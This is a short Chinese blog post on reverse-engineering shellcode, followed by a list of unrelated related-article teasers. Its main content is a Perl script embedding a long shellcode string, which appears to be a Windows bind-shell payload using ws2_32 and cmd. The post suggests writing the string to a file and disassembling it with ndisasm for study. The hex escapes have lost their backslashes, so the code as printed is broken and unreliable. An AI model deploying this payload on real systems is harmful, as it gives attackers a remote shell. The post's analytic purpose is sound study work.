如何逆向分析shellcode?

原創 luoage_ 2020-02-20 16:34
原文地址:如何逆向分析shellcode?作者:小心
如何逆向分析shellcode?
經常可以看到一些精彩的shellcode,但又不知道它怎麼來得,一堆16進制數字看的眼暈。這裏有個方法:
首先用perl將這段shellcode寫入一個二進制文件,然後利用反彙編工具進行反彙編,就可以看到shellcode對應彙編源碼咯。呵呵
例如:
#!/usr/bin/perl
$shellcode=
    "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c".
    "x24x24x8bx45x3cx8bx7cx05x78x01xefx8b".
    "x4fx18x8bx5fx20x01xebx49x8bx34x8bx01".
    "xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
    "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f".
    "x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb".
    "x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64".
    "x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
    "x08x5ex68x8ex4ex0execx50xffxd6x66x53".
    "x66x68x33x32x68x77x73x32x5fx54xffxd0".
    "x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66".
    "x81xedx08x02x55x6ax02xffxd0x68xd9x09".
    "xf5xadx57xffxd6x53x53x53x53x53x43x53".
    "x43x53xffxd0x66x68x11x5cx66x53x89xe1".
    "x95x68xa4x1ax70xc7x57xffxd6x6ax10x51".
    "x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
    "x55xffxd0x68xe5x49x86x49x57xffxd6x50".
    "x54x54x55xffxd0x93x68xe7x79xc6x79x57".
    "xffxd6x55xffxd0x66x6ax64x66x68x63x6d".
    "x89xe5x6ax50x59x29xccx89xe7x6ax44x89".
    "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93".
    "x8dx7ax38xabxabxabx68x72xfexb3x16xff".
    "x75x44xffxd6x5bx57x52x51x51x51x6ax01".
    "x51x51x55x51xffxd0x68xadxd9x05xcex53".
    "xffxd6x6axffxffx37xffxd0x8bx57xfcx83".
    "xc4x64xffxd6x52xffxd0x68x7exd8xe2x73".
    "x53xffxd6xffxd0";
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
然後利用反編譯工具,比如nasm下的ndisasm,或者W32Dasm之類的反編譯shellcode.bin,就可以看到對應彙編源碼,從而學習人家的shellcode喔!呵呵
luoage_
發佈了73 篇原創文章 · 獲贊 7 · 訪問量 3萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

基於istio實現單集羣地域故障轉移

本文分享自華爲雲社區《基於istio實現單集羣地域故障轉移》,作者:可以交個朋友。 一 背景 隨着應用程序的增長並變得更加複雜,微服務的數量也會增加,失敗的可能性也會增加。微服務的故障可能多種原因造成,例如硬件問題、網絡延遲、軟件錯誤,甚

原創 2024-04-10 22:32:54

模型服務網格:雲原生下的模型服務管理

模型服務網格(Model Service Mesh)是一種架構模式,用於在分佈式環境中部署和管理機器學習模型服務。它提供了一個可擴展的、高性能的基礎架構,用於將多個模型服務進行管理、部署和調度,以此更好地處理模型的部署、版本管理、路由和推理

原創 2023-12-22 01:38:32

輕鬆搭建基於服務網格的 AI 應用,然後開始玩

在 2023 年的雲棲大會中,阿里雲服務網格 ASM 推出了《兩全其美:Sidecarless 與 Sidecar 模式融合的服務網格新形態》主題演講,並在演講中展示了一個基於服務網格 ASM 各項能力構建的 DEMO AI 應用。該應用集

原創 2023-12-01 12:48:04

兩全其美:Sidecarless 與 Sidecar 模式融合的服務網格新形態

01 前言 Istio 社區與 2022 年 9 月發佈了一種名爲 Ambient 的新架構,由於其從架構上將 Sidecar 轉變爲 4 層和 7 層代理,故而這種模式也被稱爲 Sidecarless 模式。阿里雲服務網格 ASM 是業

原創 2023-11-24 00:47:08

基於阿里雲服務網格流量泳道的全鏈路流量管理(一):嚴格模式流量泳道

概述 灰度發佈是一種常見的對新版本應用服務的發佈手段,其特點在於能夠將流量在服務的穩定版本和灰度版本之間時刻切換,以幫助我們用更加可靠的方式實現服務的升級。在流量比例切換的過程中,我們可以逐步驗證新版本服務的功能特性、可靠性等特性,一旦新

原創 2023-10-17 00:30:42

透過JVM-SANDBOX源碼,瞭解字節碼增強技術

  介紹 JVM 沙箱容器是一種 JVM 的非侵入式運行期 AOP 解決方案。通過 JVM-SANDBOX 可以在不重啓,不侵入目標 jvm 的前提下對目標方法進行代碼增強。 無侵入,類隔離,可插拔,多租戶,高兼容是它的特性,JVM-SA

原創 2023-09-13 23:13:29

企業級服務網格優化中心:優化 Service Mesh 以提高性能和高可用性

Service Mesh 是一種用於管理微服務架構中網絡通信的解決方案,通過在每個服務實例中添加代理,實現流量控制、服務發現、負載均衡等功能。雖然 Service Mesh 能夠提供很多優秀的功能,但也存在一些性能問題,譬如 延遲增加:S

原創 2023-07-18 01:17:34

KServe + Fluid 加速大模型推理

背景 KServe 是 Kubernetes 上的標準模型推理平臺,專爲高度可擴展的場景而構建,支持現代 Serverless 推理工作負載,用於在任意框架上提供機器學習(ML)模型服務。它提供高性能、高度抽象的接口,以支持常見的 ML

原創 2023-06-29 00:32:06

我的新書《高性能Java系統權威指南》

各大書店正在銷售,停止內卷,學點實用的 本書代碼最新地址 https://gitee.com/xiandafu/java-performance 每章的readme.md 包含了主要代碼的說明 節選 書中章節 第1章 Java代

原創 2023-02-03 01:28:34

強制空 section

強制編譯空的section 說明 一般默認如果一個section沒有內容是不會創建的。 不過不知道最新的ld,gcc有沒有修改。 強制 . = 0, . = . + 0, . = sym, . = . + sy

原創 2022-04-30 14:21:03

編譯一個小的可執行程序

一個儘量小的a.out 面向syscall編程 C函數之類的,環境之類的都自己實現。 完全的自給自足。 編譯鏈接 按照文件格式進行。 最小的應該是64bit.大小 案例 代碼test.c

原創 2022-04-30 14:21:02

ucore_lab1實驗報告

此篇是學習ucore操作系統lab1的實驗報告,參考了很多資料和文章,也學到了不少。 先看要求: 爲了實現lab1的目標,lab1提供了6個基本練習和1個擴展練習,要求完成實驗報告。 對實驗報告的要求: 基於markdown格式來完成,以

原創 2022-04-30 12:52:09

g0 m0

g0和m0 g0 和 m0 在runtime中是比較重要的概念這裏講一下,它們到底什麼? m0 m0 表示進程啓動的第一個線程,也叫主線程。它和其他的m沒有什麼區別,要說區別的話,它是進程啓動通過彙編直接複製給m0的,m0是個全局變量

原創 2022-04-30 12:24:33

webcomponnets知識分享

Web Components 簡史 HTML Components(HTCs) 1998年微軟提出了革命性的技術—— HTML Components ,意圖用 HTML 組件來取代 ActiveX 組件,這是最早的 Web Componen

原創 2022-04-30 06:41:45

字節碼到底做了什麼

穿山甲到底說了什麼,原文沒說,所以這個問題一直遺留到了現在。 初識字節碼 分佈式部署架構帶來服務拓撲不清、服務依賴關係複雜、日誌散落在各個微服務中。可以使用javaagent+ASM技術可以自動注入埋點的代碼 常用的字節碼技術 java

原創 2021-12-25 21:37:22